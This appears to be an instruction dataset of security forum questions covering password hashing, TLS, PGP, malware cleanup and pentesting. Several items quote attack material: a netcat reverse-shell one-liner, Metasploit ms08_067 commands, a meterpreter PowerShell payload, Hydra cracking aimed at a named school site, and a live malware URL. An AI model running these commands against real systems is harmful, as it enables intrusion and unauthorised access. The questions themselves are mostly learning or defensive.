instruction
stringlengths
24
29.9k
I have a Ubuntu 13.10 live usb. I gave it to somebody so that he can install ubuntu. Now I have received it back. I was wondering if it is possible to infect a live usb with spyware or virus ? If yes, how to detect it ?
Let's say my application connects to my database. This requires me to have the username and database in my config as follows: postgresql://scott:tiger@localhost/mydatabase I have an automated deployment to set this up and I don't want to store the database both in the application and my deployment script. Therefore my...
I really like this upload package and want to use it, but from the time I set it up on my server, I've been hacked twice by something called the AnonGhost virus (anonghost.com). I tracked the malicious files back into the jQuery-File-Upload-9.5.6 folder, which I downloaded from my hosting server back to my local direct...
I created a windows/meterpreter/reverse_https powershell payload using the python script provided at the end of this article. In the first run, the meterpreter session opened successfully, when I closed it and tried to execute the powershell command again, I got a "Windows PowerShell has stopped working" error. Any ide...
Here is a few questions revolving around the same core problem. Let's say I generate a PGP keypair. I now get the keypair signed by person A at signing party X. In the evening, I give my now-signed public key to person B. Next day I get my public key signed by person C at signing party Y. In the evening, I give my now...
Page 183 of Secrets & Lies on countering denial-of-service attacks: Some researchers have proposed defenses that force the client to perform an expensive calculation to make a connection. The idea is that if the client has to spend computation time to make a connection, then it can't flood the target with as man...
My machine along with several other machines are connected to wireless router. When i open some http page on same machine(M1) where wireshark is installed, it captures the packets such as HTTP GET or POST but when i open same http page from other device(M2) which is connected to same router, i see the entry for it in ...
We are going to secure our software development life cycle and have been researching for a good model to start with. I have found 3 major models (methodologies?) which are : Cigital SDLC (7 touch points ) Microsoft SDLC OpenSAMM SDLC BSSIM I couldn't choose either of them since i have no idea which one is best cho...
How come I'm allowed to reboot a computer that I don't own, put in a USB, boot ubuntu from it and then access all files stored on the drives available (even critical files such as system files on C drive in Windows)? Isn't there a way to prevent people from doing this, without putting up a password on the BIOS?
As a blanket approach to dealing with XSS attacks, rather than having to remember to escape user-generated code, is there a way to instruct the browser not to execute any script or script-function which isn't signed with a particular public key (embedded in the top of every page, but not necessarily authenticated. Thi...
If I do a fresh installation of ubuntu from an uninfected cd, will it remove all the existing rootkits/malwares/spywares/viruses etc if any ? Is formatting the hard disk required before reinstalling or these malicious programs will be removed even if the disk is not formatted before reinstalling?
What's wrong with you, you crazy fool, you're not supposed to be able to retrieve a password in plain text! I know. Hear me out. Assume I've got a service that's similar to Mint.com. For those that aren't familiar with Mint, it works like this: User signs up to Mint.com much like they would any other online service - ...
The Bitcoin alternative, Litecoin uses a different algorithm to protect the block chain, namely Scrypt (not Sha256). Given that GPU accelerators exists, and ASICS are due to be released, does the widespread implementation of the Litecoin network affect the implied security of my hashed password database? Does the mere...
I'd like to purchase a domain name from a country that does not require citizenship, since they can make nice urls, they are more available and sometimes not too expensive too! But few things annoys me and it could compromise services under that domain name. DNSSEC Not everyone uses it and sets it up properly but many...
tl;dr sleep() costs my servers resources. Using it to delay response to the attacker might cost him/her time, but allows for DOS. Is it possible to keep him/her waiting without costs of mine? Long Assuming I can tell (or at least very well estimate) that data send to my via POST method is an attack. First in a fit of a...
I need to find some materials about how Security Accounts Manager(SAM) works in windows 7+. I am confused with the storage format of hashed value. Many materials (such as, 1) tells me that it uses NTLM(or NTLM v2). However, as far as I understand, the security level of NTLM is very low. Most OS(such as unix) will provi...
So there is an application that accepts some data from the outside. Assuming that it accept only finite number of different POST/GET parameters and the application is correctly handling all the data sent with these parameters, is there a way to exploit an application sending additional parameters. By this I mean the fo...
I’m currently trying to improve the security at our work. This sounds very broad, but, for example, I’m penetrating our systems and checking whether servers are vulnerable to certain exploits. As an example, SMTP gave me this telnet result: 220 [redacted] Microsoft ESMTP MAIL Service, Version: 7.5.7601.17514 ready at M...
Background info: About 50% of the ADSL and cable internet access in Germany (and presumably parts of the EU) goes over AVM Fritz routers, either verbatim or rebranded as e.g. "1&1 Home Server" or "T-Online Box". These are embedded MIPS systems with a couple of ethernet ports, an ADSL or similar plug, and other optional...
My Corporate Network was always being monitored, but a few days ago they started to block and censor all HTTPS traffic. Recently IT guys forged certificates for all major HTTPS web sites and acts as a man in the middle. The rest of the HTTPS does not work at all. I cannot and will not connect to a secure site knowing t...
I'm trying to lookup all call rax instructions with msfelfscan, but %> msfelfscan -j rax /bin/ls Invalid register "rax" Was it not supported?
I'm working on a specific (hypothetical) situation, where I have two client machines attempting to perform a public key exchange, via a server. There's no possibility for a direct connection between the two clients, as the exchange is asynchronous. The server cannot be completely trusted. As it is facilitating the key ...
I'm setting up a small code-hosting web site, in the vein of github or bitbucket. I would like to allow users to specify an arbitrary URL from which my site's server will initially clone their repository. I'm using mercurial, so cloning essentially just means negotiating a simple HTTP-based protocol between the client ...
Some companies build their own software. Others outsource software development by hiring contractors or other companies to build software they need. When we need to build new custom software, is there any evidence whether the choice to develop in-house vs outsource software development has an effect on security? All ...
I use bcrypt (32 rounds) and once the hash is produced, I get the sha512 of that hash and I then hash that with blow fish and once that is done, I hash it again with sha512 with a salt that has been hashed with bcrypt (94 rounds) that is 33 characters long to each user password. So is that secure or not?
I'm running Snort version 2.9.6.0 and I'm not able to log events from the sfportscan preprocessor using the unified2 file format. This is the conf (actually is the default one): preprocessor sfportscan: proto { all } memcap { 10000000 } sense_level { medium } If I add logfile { /var/log/snort/portscan.log } the event...
I recently had a malware issue called "mysearchdial" that installed itself into my home computer's browser because someone didn't pay attention to what they were installing. I RDP'd into my work computer before this malware was completely removed, and I found that this malware had spread to my browsers at my work PC. N...
When the subject of password hashing comes up, a lot of developers get exasperated by people using outdated, broken, or hand-rolled hashing schemes, and I frequently hear "just use bcrypt!" repeated like a mantra. But when I mentioned this to another developer recently, he said that bcrypt is based on Blowfish, whose ...
Suppose I have a password made of n alphabetic characters. An attacker is given the hashed password and will attempt a brute force attack on cracking it. I can envision a naive password cracker trying all combinations starting with AAAA...A then AAAA...B then AAAA...C etc until ZZZZ...Z. For this attacker, a password ...
I have noticed many website going to a two-page (not two-factor) login system - where you enter your username on page 1 and click submit, and then enter your password on page two and click submit. What are the benefits to doing this vs having username and password on one page and clicking submit? Is it only to avoid pa...
I'm reviewing a website a friend developed, and was looking for general errors and concerns. In reviewing I noticed he is very heavy on ajax calls using JSON to a RESTful API that he maintains on a different server. While some calls are simply things that return content, some are more sensitive to get attributes of a u...
I am using EncFS with a USB drive. How secure is this if my USB drive gets stolen? I ask because the .encfs6.xml file is saved in the USB drive and I can open it with a normal text editor. Do I need to be concerned that the .encfs6.xml can easily be opened with a text editor if the USB drive is stolen?
I'm doing some pentesting against a machine the lecturer set up in the lab. NMAP shows port 445 to be filtered and Nessus confirms the ms08_067 vulnerability is present on that machine. I tried running Metasploit against it the normal way: use exlpoit/windows/smb/ms08_067_netapi set RHOST TARGET_IP set PAYLOAD windows/...
I am building yet another website which requires user and session authentication. This time I want to be complete security paranoid and actually care if the passwords or sessions are stolen. I have few requirements for the security of password authentication: The passwords are not stored in the server as clear text. B...
I got a DVD with copy protection enabled on it, but the problem I am facing is that it loads extremely slow. I have seen such happenings with other kinds of protected DVD's as well. Can anyone tell me why they are slow in loading as compared to the other DVD's. I know that such kind of DVD's utilize Content Scrambling ...
If I'm an OAuth provider and I want to empower the user to restrict apps to only a subset of resources (for example, only resources in folder X), what is the right mechanism to do this? Scopes would seem to be it, but I find little to no precedent for this. I often see scopes implemented as different permissions, e.g. ...
I feel like I'm asking a fairly obvious question here, but with it being so easy to make mistakes in this space, here goes. From wikipedia: DK = PBKDF2(PRF, Password, Salt, c, dkLen) dkLen is the desired length of the derived key How do I decide which is the "desired length"?
After two recent Slashdot articles (#1 #2) about questionable Root Certificates installed on machines, I decided to take a closer look at what I have installed on my machines. (I use current versions of Chrome on Win7, which I understand uses the Windows list of CAs) What I found really surprised me. Two relatively cl...
I'm implementing a mobile app which uses AES encryption algorithm to encrypt some critical values being sent to a remote server (basically, the user password), and then decrypted on the server side using the same private key. This works perfectly now, but I'm a bit concerned about how to store/get the private key. Curr...
My Server is Windows 2008. Mr. X is accessing my web server using Mr. X's certificate. In that time, an outsider is also trying to access my server using Mr. X's certificate (somehow he got it). Is it possible to disable multiple access using one certificate? N.B: I mapped 900 certificates to my SSL-enabled server whi...
maximun key for MCRYPT_RIJNDAEL_256 ? mcrypt_encrypt( MCRYPT_RIJNDAEL_256, <<==hash_hmac using sha512==>>, $text, MCRYPT_MODE_ECB, $iv ) Warning: mcrypt_encrypt(): Size of key is too large for this algorithm in C:\xampp\htdocs\natabuana.com\cpanel\encryption.php on line 18
Do you know what does RHSA, RHEA and RHBA stands for in RedHat Errata ?
I have just started educating myself about cryptography, and while it is mostly making sense, a few things are still eluding me. One being: In systems that take a user's pass-word/-phrase in order to derive the encryption key, what is the relationship between that password's strength and the key's strength? I know pass...
Tomcat gives a configuration sessionIdLength to be configurable, but does increasing the session id increases its security or its just security through obscurity
I was going through a study of IPsec and I found that there are redundant sequence numbers: one in the AH or ESP header, and the other is in the TCP header for a communication. Is it not an inefficient use of sequence numbers as we are using the same number again and again? What is the need of this redundancy of seque...
Does Active Directory Certificate Services support accepting requests for, and generation of, Card Verifiable Certificates (TR-03110)? If so, in which version of Windows Server was the functionality introduced? I have been unable to find any reference to Card Verifiable Certificates in the Active Directory Certificate ...
After reading about STARTTLS and SSL and performing a scan/pentest at our server I have the next question regarding security: Is this STARTTLS warning below a security-vulnerability? And if so why? As far I understand STARTTLS, it means: Encrypt if both sides support encryption, else use unencrypted connection and SS...
I'm going to buy a new ADSL wireless modem, and what really matters to me is security. So, what are the criteria I should consider, and which security features should I look for? How should I compare the modems in terms of the security (for example, WPA2 > WPA > WEP !!!)?
I have a website, using an ads service (qadabra). Yesterday some users reported me that the ads service sometimes redirects to a site containing malware. the url is this: PLEASE DON'T OPEN IT, IT MAY DAMAGE YOUR PC!!! http :// download.abocde.com /Flashplay /APX/ IT/ auload.php?installer= Flash_Player_11_for_Other_Brow...
Imagine you have a server that is at a location which is not trustworthy. People might have physical access to the machine who are not supposed to look at the data stored on it. In this scenario I thought about setting up a server with full disk encryption. This means that the key needs to be entered before the system ...
the PCI DSS document states: 11.3.2 Perform internal penetration testing at least annually and after any significant infrastructure or application upgrade or modification (such as an operating system upgrade, a sub network added to the environment, or a web server added to the environment). 11.3.1 Perform ex...
I have just deployed a Turnkey appliance which comes configured with a self signed certificate. This is a server that only I will be using, so I don't want to pay for a certificate. If I add this certificate to my web browser's Trusted Root Certification Authorities store: Will it protect from a MITM attack if the atta...
Say I have a computer with 2 operating systems: one secure, one... not so much. Now say I want to use the insecure system to do some work I can't do on the secure one. What is the best way to isolate the 2 systems so that if one system goes completely nuts the other system cannot be harmed in any way, shape, or form?
I recently registered for a website and received an email that said "Thanks for registering, here's the username and password you used to sign up". The webmaster assures me that plaintext passwords are not stored in the database, but even if the plaintext is only kept long enough to send the email, that's still a bad s...
I've read that a malware found by kaspersky was compiled at the moscow time zone. How they know the time of compilation ?
It's my understanding files kept on Google Drive are not protected. I would like to have them encrypted so that to be able to view or modify them one must enter a password. I foresee a potential dilemma: the computer must have the encryption/decryption tool to do this, thus defeating the portability of Google Drive. A ...
What are the security checks that I can make on a PDF file being transferred between server and the client?
I am reading up on PHP's crypt() function. I have a few questions on it - What is the significance of the trailing '$' sign at the end of the salt string that I see in most examples. The manual doesn't specifically say anything about ending the salt string with it. Is there anyway I can extract only the salt portion ...
I'm trying to implement, as an exercise, a protocol based on the cipher suite ECDHE-RSA-AES256-GCM-SHA384. As I understand things, ECDHE is used for the key exchange, RSA for the authenticity of the ECDHE public key, AES (in GCM) for encipherment, and SHA to get a random-like key to use with AES from the ECDHE derived ...
Wanting to go a step further into reducing the attacking surface from my "register new user" form I think on using reCAPTCHA (the one Google offers). Having bots sorted out from being able to register and hence not being able to easily break my website seems good. And to what I understand reCATPCHA helps with keeping a...
I own a set of REST APIs and some of them don't require users to be authenticated. Example could be: api/items/index of an e-commerce". Currently, I use Cookie-based tokens from my application, but only for secured API like edition of an item: api/items/2/edit for instance. What could prevent anybody to track...
As with a large amount of open-source softwares, (Debian, Eclipse, PHP) you can apply to become a mirror of their site/downloads. I fully understand that this helps them with bandwidth and distribution. However, what stops people uploading malicious copies of the software to their mirror? I know some sites offer MD5/SH...
I would like to know why, by default, Windows set an audit rules on svchost.exe ? While it's used only when auditing is active, i don't understand why there's a special treatment for this file since auditing is disabled by default anyway.
Consider a scenario where my service is using a keystore made of self signed cerificate and the load balancer which is balancing traffic for service is binded with a CA approved certificate. I would like to know when communication starts between Client, who responds to client with the certificate ? will Service respond...
I view certificates of https://www.google.com.ua/ So I thought, when requesting via cURL, if I point by CURLOPT_CAINFO to those certificates (GeoTrust Global CA and Google Internet Authority G2 in a bundle or whatever), the validation of google's certificate would be passed. But the only CA that does it is the Equifa...
I'm trying to learn some things about REST apis and one of the topics that I'm having some trouble is security. I'm using angularjs for web interface ans slim framework for the php api. I've read some articles (I liked this one) and started to implement HMAC following this tutorial (not exactly the same steps). I would...
One of my colleagues has a web api call that is checking that the user is logged in and his token matches what is in session (thanks to all of you for your help). Let's say this is layer blue. After it's confirmed the user is who they say they are, it then makes a call to another API on another server (let's call it la...
I am wondering if there is a way to detect if a reverse shell is blocked by egress filtering or an obligatory proxy, or the exploit just failed. I am asking this question in the context of a SE media dropping senario.
I'm developing a webserver that performs digital signatures of (xml, pdf and office) documents and then validates those signatures. My idea is: an user puts its SmartCard and through a PIN, he gets his private key. Then, the private key must be sent to the server, so that the server may sign the document with that key....
I'm trying to develop a website that performs digital signatures on client-side and then sent the signed document to the server-side. I want to do the signatures on client, due to the fact of not sending away the user's private key. This key (in theory) must be always with the user and it must not be sent to the web (e...
My new router supports both the 2.4 and the 5 Ghz bands, and it obviously allows me to set a different password for each of them. Now, since cracking just one of the two means that the attacker would gain access to my network anyways without needing the other one, are there any reasons why I should set a different pass...
When trying to visit https://www.ebay.com, I noticed that I get redirected to HTTP immediately. Here's what cURL says about that: $ curl --max-redirs 0 -v -L https://www.ebay.com * Rebuilt URL to: https://www.ebay.com/ * Adding handle: conn: 0x6c8cc0 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToP...
Is it possible to recover securely (or wiped out) deleted data from a hard drive using forensics? Imagine police have arrested a hacker, and that hacker, before getting caught, has removed all information that leads him/her to be found guilty on his/her PC using a secure deleting method. In this case, is it possible fo...
In TCG specification (for TPM devices) they specify how a static root of trust can be built up using secure boot and trusted boot. An alternative method appears to be Intel's Dynamic boot using their Intel TXT technology. I was just wondering from a security point of view which is preferable and what the major differen...
This paper appears to describe a solution in which XSS attacks stealing cookies are made pointless by having the server send clients a cookie with a hashed name. Whenever the user sends the cookie back to the server, the server will take the hash and regenerate the original name of the cookie. Thus, supposedly, even if...
I'm in the process of building a network of small devices (ARM microcontrollers with something like nRF24L01 connectivity). The controllers will be receiving commands from a central system over these wireless links, and I'm in the process of designing the protocol. Confidentiality is a non-goal, but integrity & authe...
I was wondering if I can put a download URL for my recipients to get my GPG public key easily in my email signature. Is this a good practice? If not, what's a good alternative?
I think the title question speaks for itself, but here are the details: You have 4 bits for the buttons, 16 bits for the counter, and a fix 16 bit ID. The transmitter would send out these bits plus an extra 32 bit word read from a ROM addressed by the counter. The reciever would look up the address in its own ROM and c...
The Triple Handshake Issue was disclosed lately. As far as I understand it, it highly depends on renegotiation and resumption. So the simple question is: Would disabling resumption and/or renegotiation mitigate this problem? In more details: Renegotiation seems to be quite secure, and there is only one problem about ne...
First of all i don't know if this question already mention here, believe me i search already. so i was trying to break string inside single and double quote of attr below; onclick="window.location='{$url4stat}en'" now lets say the webapps urls like http://example.com/index/ i was able to inject random param after the ...
When trying to encrypt files, I get the following error in KGpg editor window: The encryption failed with error code 2 On the command line I get: $ gpg --list-keys /home/user/.gnupg/pubring.gpg --------------------------------- pub 2048D/5E04B919 2012-02-02 [expires: 2016-02-01] uid Firstname Last...
How do you protect your server at the datacenter from physical access by unauthorized personal? Considering protection against malware (keylogger and trojans) and having data- and OS integrity? Is it even possible?
Linux, NetBSD, etc. can be installed with LUKS, so besides the /boot, all other FS will be encrypted. Probably the kernel needs to be booted before the password prompt gets to the user. The LUKS password My question: Does it makes sense to change the LUKS password at every 90 days? (I mean how can an attacker gain th...
This statement in the iOS 7 release notes implies that non-China devices do not need user consent: iOS now requests user consent for apps to use audio input on all iOS 7 devices. For devices sold in China, iOS will also request user consent for apps to use the camera hardware. iOS SDK Release Notes for iOS 7 GM ...
My web application is built with ASP.Net MVC5. One of the method accept query string params. Security testing has reported that it accepts malicious query string and displays in the body without any modification. the url including the Query parameters are added to the html output by the MVCContrib pager for paginatio...
Jsteg algorithm is vulnerable to statistical attacks because it influences the DCT histogram of an image perceptibly since it equalizes the number of paris of coefficients. F3 algorithm, instead of replacing LSB's, decrements the coefficient's absolute values. However, some shirngkage occure in this case. Beacuse 0 coe...
Should a user be allowed to request a password reset email and then log in (i.e. disregarding the reset email and using their existing password) or should the current account be locked until the password is reset? If you disabled the account I could see this being abused by an 3rd party (i.e. requesting a password rese...
I observed today that Thunderbird/Enigmail (24.2.0/1.6) does not allow me to select a key for encrypting mails to one of the addresses associated with the key, even though others work. Help sites claim that the reason must be a lack of user trust, but the key is trusted (fully). I think I tracked down the issue to some...
So, if I'm surfing the web (google etc..), can they see that I'm surfing from my laptop which is remotely connected to my desktop PC? Or will they only be able to see that my desktop PC is connected to their site? I'm currently using teamViewer for remote access to my desktop PC. Thanks, Jay.
I'm building an open source distributed (and partly offline replicated, as it's assumed that the network will be unstable) CMS and one of the core system 'job' will be to group all the files and generate a unique hash from them. This special hash will be checked against a genuine hash to see if they match, so to ensure...
I've been searching and searching for what seems days and have not come up with any definitive answer on a solution to my problem. To explain without going into terrible detail I am building a store, this store does NOT have a cart system, so the user will purchase one item at a time, possibly with a quantity system bu...
I have a CSV/Excel file which in which I want to test out the links which do not have SSL but ask for Username / Password. Is there a program which determines if each site on a list encrypts its login information as it is being sent?
Backstory: Stack Exchange's markdown parser allows a couple of HTML tags (a,b,i,img) through, with some restrictions on the attributes to prevent XSS. We're thinking of requesting the <cite> tag to be allowed so people can include citation metadata in the script. So, the question is, does allowing the <cite> tag to be ...
I've been using Diffie-Hellman (although, now looking into SRP) for sending data encrypted between two hosts. After the initial handshake, both the end hosts have generated the same shared secret. So, I immediately made the assumption that the shared secret can be used as a "password" in a cipher, since, I can safely a...
In one of the articles I have came across an exploit of Dell devices that said when you trigger the following line of code (executed somewhere in php) you will get a remote root shell : mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 4444 >/tmp/f I understand the part that by creating the fifo pipe and pipi...
I'm proposing the use of a login system that sends a one-time login token (with high entropy) via email to the user. After using the token, the user receives another token via email and the previous token is invalidated. The new token is sent with information about the use of the last token, so if someone does gain acc...
Why did firefox remove Javascript injection on address bar? Someone said it was a security issue. What security issues could there be?
I have never experimented much with online password crackers. I attempted to use Hydra today on this website www.athena2.harker.org and I keep getting false positives. This is what I have done so far: pinged the website and obtained the IP address of 209.23.201.55 identified the form type, its an https-form-post <form...
What packet parameters should be checked to detect layer-7 DDoS attack (http flood, slow http request etc.)? Do window size and packet timeline show enough information to detect attack traffic from legitimate traffic? What are the other parameters need to be verified?
Assuming the following: Operating arbitrary software in a completely read only environment is impractical. (While some software will operate RO without issue, it can be nigh impossible for other software, particularly if source code is not available as is sometimes the case) Rebuilding any machine in place is trivial ...